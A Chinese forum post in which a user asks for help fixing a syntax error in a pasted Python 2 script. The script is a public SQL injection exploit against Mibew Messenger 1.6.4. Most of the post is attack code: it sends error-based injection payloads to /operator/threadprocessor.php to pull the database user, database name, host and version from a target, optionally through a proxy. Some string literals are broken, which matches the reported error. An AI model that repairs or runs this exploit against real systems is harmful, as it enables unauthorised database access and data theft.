- 论坛徽章:
- 0
|
我有一个python脚本,是个注入检查的脚本,运行时候会报错,麻烦高手帮我 检查一下语法问题 可以吗?第43行- #!/usr/bin/python
- #Author: Ucha Gobejishvili
- #Timeline: 2012-08-05 Bug Discovered
- # 2012-08-05 Public Disclosured
- #Vendor: Mibew Web Messenger (http://mibew.org/ )
- #Version: Mibew Messenger 1.6.4
- #Demo: http://demo.mibew.org
- #Introduction:
- #Mibew Messenger (also known as Open Web Messenger) is an open-#source live
- #support application written in PHP and MySQL. It #enables one-on-one chat
- #assistance in real-time directly from #your website.
- #Abstract:
- #Discovered SQL injection Vulnerabilities on the Mibew Messenger #v.1.6.4.
- #A SQL Injection vulnerability is detected on the Mibew #Messenger v.1.6.4
- #The vulnerabilities allows an remote attacker #to execute own sql commands
- #on the affected applicationdbms. #Successful exploitation can result in
- #dbms, web-server or #application compromise.
- # python Mibew.py -p localhost:8080 -t localhost:8500 -d /Patch/
- import sys, httplib, urllib2, urllib, re
- from optparse import OptionParser
- usage = "./%prog [<options>] -t [target] -d [directory]"
- usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/"
- parser = OptionParser(usage=usage)
- parser.add_option("-p", type="string",action="store", dest="proxy",
- help="HTTP Proxy <server:port>")
- parser.add_option("-t", type="string", action="store", dest="target",
- help="The Target server <server:port>")
- parser.add_option("-d", type="string", action="store", dest="directory",
- help="Directory path to the CMS")
- (options, args) = parser.parse_args()
- def banner():
- print "\n\t|----------------------------------------------------------- |"
- print "\t| Mibew Web Messenger SQL Injection Vulnerability|"
- print "\t| |\n"
- if len(sys.argv) < 5:
- banner()
- parser.print_help()
- sys.exit(1)
- def getProxy():
- try:
- pr = httplib.HTTPConnection(options.proxy)
- pr.connect()
- proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
- except(socket.timeout):
- print "\n(-) Proxy Timed Out"
- sys.exit(1)
- except(),msg:
- print "\n(-) Proxy Failed"
- sys.exit(1)
- return proxy_handler
- def setTargetHTTP():
- if options.target[0:7] != 'http://':
- options.target = "http://" + options.target
- return options.target
- def getRequest(exploit):
- if options.proxy:
- try:
- proxyfier = urllib2.build_opener(getProxy())
- check = proxyfier.open(options.target+options.directory+exploit).read()
- except urllib2.HTTPError, error:
- check = error.read()
- except socket.error:
- print "(-) Proxy connection failed"
- sys.exit(1)
- else:
- try:
- req = urllib2.Request(options.target+options.directory+exploit)
- check = urllib2.urlopen(req).read()
- except urllib2.HTTPError, error:
- check = error.read()
- except urllib2.URLError:
- print "(-) Target connection failed, check your address"
- sys.exit(1)
- return check
- basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname:
- ':'host_name()','version: \n\n\t':'@@version'}
- def basicSploit(info):
- return "/operator/threadprocessor.php?threadid=1+and+1=convert(int," + info + ")--"
- if __name__ == "__main__":
- banner()
- options.target = setTargetHTTP()
- print "(+) Exploiting target @: %s" % (options.target+options.directory)
- if options.proxy:
- print "\n(+) Testing Proxy..."
- print "(+) Proxy @ %s" % (options.proxy)
- print "(+) Building Handler.."
- for key in basicInfo:
- getResp = getRequest(basicSploit(basicInfo[key]))
- if re.findall("the nvarchar value '", getResp):
- dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type
- int')[0]
- print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())
|
|
免费注册
发表于 2014-01-23 22:54
